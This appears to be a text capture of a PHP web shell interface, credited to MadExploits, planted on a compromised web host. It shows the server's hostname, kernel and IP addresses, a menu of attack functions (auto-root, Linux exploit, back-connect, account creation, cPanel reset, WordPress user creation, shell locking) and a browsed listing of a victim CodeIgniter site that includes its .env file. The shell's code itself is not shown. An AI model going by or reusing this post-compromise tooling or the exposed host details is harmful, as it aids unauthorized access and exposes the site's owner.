Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.223
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
amana.tradesense.co.ke /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
github
[ DIR ]
drwxr-xr-x
newtradesite
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
writable
[ DIR ]
drwxr-xr-x
.env
4.69
KB
-rw-r--r--
.gitignore
1.82
KB
-rw-r--r--
LICENSE
1.13
KB
-rw-r--r--
README.md
2.45
KB
-rw-r--r--
composer.json
1.94
KB
-rw-r--r--
newtradesite - Shortcut.lnk
970
B
-rw-r--r--
phpunit.xml.dist
2.01
KB
-rw-r--r--
spark
3.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "codeigniter4/framework", "type": "project", "description": "The CodeIgniter framework v4", "homepage": "https://codeigniter.com", "license": "MIT", "require": { "php": "^7.4 || ^8.0", "ext-curl": "*", "ext-intl": "*", "ext-json": "*", "ext-mbstring": "*", "kint-php/kint": "^4.2", "laminas/laminas-escaper": "^2.9", "psr/log": "^1.1" }, "require-dev": { "codeigniter/coding-standard": "^1.5", "fakerphp/faker": "^1.9", "friendsofphp/php-cs-fixer": "~3.11.0", "mikey179/vfsstream": "^1.6", "nexusphp/cs-config": "^3.6", "phpunit/phpunit": "^9.1", "predis/predis": "^1.1 || ^2.0" }, "suggest": { "ext-imagick": "If you use Image class ImageMagickHandler", "ext-simplexml": "If you format XML", "ext-mysqli": "If you use MySQL", "ext-oci8": "If you use Oracle Database", "ext-pgsql": "If you use PostgreSQL", "ext-sqlsrv": "If you use SQL Server", "ext-sqlite3": "If you use SQLite3", "ext-memcache": "If you use Cache class MemcachedHandler with Memcache", "ext-memcached": "If you use Cache class MemcachedHandler with Memcached", "ext-redis": "If you use Cache class RedisHandler", "ext-fileinfo": "Improves mime type detection for files", "ext-readline": "Improves CLI::input() usability" }, "autoload": { "psr-4": { "CodeIgniter\\": "system/" }, "exclude-from-classmap": [ "**/Database/Migrations/**" ] }, "scripts": { "post-update-cmd": [ "CodeIgniter\\ComposerScripts::postUpdate" ], "test": "phpunit" }, "support": { "forum": "http://forum.codeigniter.com/", "source": "https://github.com/codeigniter4/CodeIgniter4", "slack": "https://codeigniterchat.slack.com" } }
Close